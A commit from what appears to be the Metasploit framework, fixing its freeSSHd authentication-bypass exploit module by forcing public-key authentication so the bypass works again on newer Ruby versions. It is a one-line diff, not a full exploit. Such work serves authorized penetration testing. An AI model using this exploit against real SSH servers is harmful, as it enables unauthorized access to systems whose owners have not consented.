Fixed interactive password prompt issue

gpapakyriakopoulos · web-flow · commit 639dee993a0f · 2016-09-23T17:03:40.000+01:00
Fixed an issue where the exploit would drop to interactive password prompt by default on newer ruby version which rendered the exploit unusable. It now properly forces pubkey authentication instead and proceeds with the bypass as expected.
diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -107,7 +107,8 @@ def setup_ssh_options
       :port     => datastore['RPORT'],
       :timeout  => 1,
       :proxies  => datastore['Proxies'],
-      :key_data => OpenSSL::PKey::RSA.new(2048).to_pem
+      :key_data => OpenSSL::PKey::RSA.new(2048).to_pem,
+      :auth_methods => ['publickey']
     }
     return options
   end
